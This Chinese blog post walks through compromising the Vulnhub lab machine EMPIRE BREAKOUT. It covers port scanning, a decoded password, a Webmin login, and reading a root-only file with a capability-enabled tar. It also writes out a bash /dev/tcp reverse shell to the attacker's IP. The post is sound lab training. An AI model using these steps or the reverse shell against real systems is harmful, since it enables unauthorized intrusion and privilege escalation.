首页 > 其他分享 >【渗透测试】Vulnhub EMPIRE BREAKOUT

【渗透测试】Vulnhub EMPIRE BREAKOUT

时间:2023-08-28 22:57:34浏览次数:40  
标签:tar 登录 端口 192.168 BREAKOUT Vulnhub pass EMPIRE 我们

渗透环境

攻击机:   IP: 192.168.149.128(Kali)
靶机:     IP:192.168.149.130
靶机下载地址:https://www.vulnhub.com/entry/empire-breakout,751/

进行渗透

一、 获取IP及端口信息

开机已经能看到靶机的IP,我们就不再扫描网段了。

扫描端口、系统、版本

nmap -sV -p- -O -A 192.168.149.130

在这里我们看到开放了80、139、445、10000、20000端口,并且识别了内核版本


二、 尝试发现漏洞

1. 访问80端口

访问80端口,发现这是一个apache2的默认页面。
查看源码,发现有一行注释,提供了一些信息

img

我之前也没有见过这种加密,那就问一下ChatGPT吧

知道是Brainfuck,然后我们找到一个在线网站对其进行解密

得到字符串 .2uqPEfj3D<P'a-3

根据他的提示,这是一个access,应该是一个密码。

2. 访问10000端口

直接访问,告诉我们应该使用https

img

访问https://192.168.149.130:10000,看到一个登录页面

我们猜测刚才得到的密码就是用于这里的登录的。至于用户名,我们可以使用Burpsuite加载字典进行爆破。不过我看到网上其他师傅使用的是enum4linux

使用命令

enum4linux -a 192.168.149.130

在最后的返回信息中我们看到有一个本地用户cyber,我们尝试使用cyber这个用户名和上面得到的字符串.2uqPEfj3D<P'a-3进行登录

结果并不太理想,我们在10000这个端口上登录失败。
但是别忘了我们还有一个20000端口还没去看过,访问20000端口,界面和10000端口一样,我们使用上面的用户密码尝试登录,成功登录!!!!!

登录后我们在页面的左下角看到一个终端图标

点击之后就是一个shell,在此直接得到第一个flag

三、 提权

在当前目录下还有一个tar文件我们还没有利用。先使用file命令看一下文件类型

file ./tar

img

可以看到这是一个可执行文件

使用getcap命令查看一下这个文件的权限。

getcap ./tar

img

cap_dac_read_search:绕过文件的 DAC(Discretionary Access Control) 读和搜索权限检查。
e:可执行文件能力。
p:进程有效用户 ID 设置。

用人话说就是这个可执行文件可以读任意文件。但是注意这个tar不是系统中安装的tar,因此我们在使用这个文件的时候记得要加上它的路径。我们可以看一下系统中的tar命令的安装路径,验证了这俩不是一个东西。

img

既然给了这个文件,那一定是存在一些敏感文件。我们在目录里找一找。
/var/backups/下我们找到一个备份文件.old_pass.bak,并且可以看到只有root用户是拥有读写权限的,这是上面的tar文件就派上用场了。我们将这个文件进行打包,然后再解包,即可解决权限问题,看到其中的内容。注意我们在/var/backups/中是没有读写权限的,因此我们要切换到当前登录用户的家目录执行以下命令。

./tar -cvf pass.tar /var/backups/.old_pass.bak      //打包生成pass.tar
./tar -xvf ./pass.tar       //将pass.tar解包到当前路径

img

此时我们就可以看到解压后的 var文件夹

进入目录查看,找到密码Ts&4&YurgtRX(=~h

反弹一个shell

kali:nc -nlvp 4444     //启动监听
靶机:bash -i >& /dev/tcp/192.168.149.128/4444 0>&1     //反弹shell

su切换到root用户,使用上面的密码进行登录。然后在/root/rOOt.txt找到第二个flag

img

渗透完成

标签:tar,登录,端口,192.168,BREAKOUT,Vulnhub,pass,EMPIRE,我们
From: https://www.cnblogs.com/MrSoap/p/17663608.html

相关文章

  • Vulnhub: DriftingBlues: 1靶机
    kali:192.168.111.111靶机:192.168.111.215信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.21580端口首页源码访问noteforkingfish.txt,发现为Ook!加密的密文解密后提示需要用户eric和修改hosts文件,解密网站:https://www.splitbrain.org/ser......
  • Vulnhub: DOUBLE: 1靶机
    kali:192.168.111.111靶机:192.168.111.209信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.209目标80端口sendcommand.php页面源码写入webshell<?phpsystem($_GET["cmd"]);?>执行命令http://192.168.111.209/production/sendcommand......
  • 0×03 Vulnhub 靶机渗透总结之 KIOPTRIX: LEVEL 1.2 (#3) SQL注入+sudo提权
    0×03Vulnhub靶机渗透总结之KIOPTRIX:LEVEL1.2(#3)......
  • Vulnhub: ICMP: 1靶机
    kali:192.168.111.111靶机:192.168.111.208信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.20880端口的cms为Monitorr1.7.6m搜索发现该版本的cms存在远程代码执行searchsploitmonitorr漏洞利用nc本地监听,再执行exppython348980.pyh......
  • 【渗透测试】 Vulnhub JANGOW: 1.0.1
    渗透环境攻击机:   IP: 192.168.149.128(Kali)靶机:     IP:192.168.149.129靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/进行渗透一、获取IP及端口信息使用nmap扫描同网段IP,如果使用的是VMware可能出现扫描不到的情况,需要在靶机的恢复模式里......
  • Vulnhub: DriftingBlues: 2靶机
    kali:192.168.111.111靶机:192.168.111.207信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.20780端口的/blog目录为wordpresswpscan收集wordpress用户和爆破密码wpscan--urlhttp://driftingblues.box/blog-eu,ap--plugins-detectionmi......
  • 【Vulnhub】OSCP
    靶场介绍靶场下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/靶场难度:容易kali:192.168.11.5靶机:192.168.11.13信息收集使用nmap扫描靶机开放的端口及服务nmap-A-T4-sS192.168.11.13可以看到靶机开启了22和80端口使用dirb扫描一下目录扫出来一个r......
  • Vulnhub: MoneyBox: 1靶机
    kali:192.168.111.111靶机:192.168.111.194信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.194ftp匿名登录发现trytofind.jpg目录爆破发现blogs目录gobusterdir-uhttp://192.168.111.194-w/usr/share/wordlists/dirbuster/directory-li......
  • Vulnhub: DriftingBlues: 3靶机
    kali:192.168.111.111靶机:192.168.111.192信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.192查看robots.txt得到提示访问eventadmins提示littlequeenofspades.html查看littlequeenofspades.html源码base64解密后提示adminsfixit.php......
  • Vulnhub 靶场 MATRIX-BREAKOUT: 2 MORPHEUS
    前期准备:靶机地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/kali攻击机ip:192.168.11.11靶机ip:192.168.11.12一、信息收集及利用1.使用nmap对目标靶机进行扫描发现开放了22、80、81端口。2.80端口访问80端口:查看页面信息没发现什么重要信息,......